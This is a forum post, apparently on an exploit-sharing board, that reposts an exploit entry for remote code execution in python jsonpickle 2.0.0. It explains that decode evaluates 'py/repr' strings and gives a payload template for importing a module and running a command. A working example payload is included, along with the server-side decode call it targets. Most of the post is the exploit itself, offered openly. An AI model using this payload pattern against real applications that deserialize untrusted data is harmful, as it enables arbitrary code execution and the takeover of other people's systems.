Jump to content

python jsonpickle 2.0.0 - Remote Code Execution

This CHT

Recommended Posts

  • Group:  The leader of the
  • Content Count:  4,798
  • Achievement Points:  31,702
  • With Us For:  243 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows

# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
# Date: 24-2-2021
# Vendor Homepage: https://jsonpickle.github.io
# Exploit Author: Adi Malyanker, Shay Reuven
# Software Link: https://github.com/jsonpickle/jsonpickle
# Version: 2.0.0
# Tested on: windows, linux

# 	Python is an open source language. jsonickle module is provided to convert objects into a serialized form, 
# 	and later recover the data back into an object. the decode is used to undeserialize serialized strings.

# 	If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls. 
# 	the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr".

#	The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet

#	the payload was found during our research made on deserialization functions.

# 	the pattern should be :
# 	{..{"py/repr":<the module to import>/<the command to be executed.>}..}

# 	example:

malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'

# 	the command on the server side
some_parameter = jsonpickle.decode(malicious)
Link to comment
Share on other sites

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...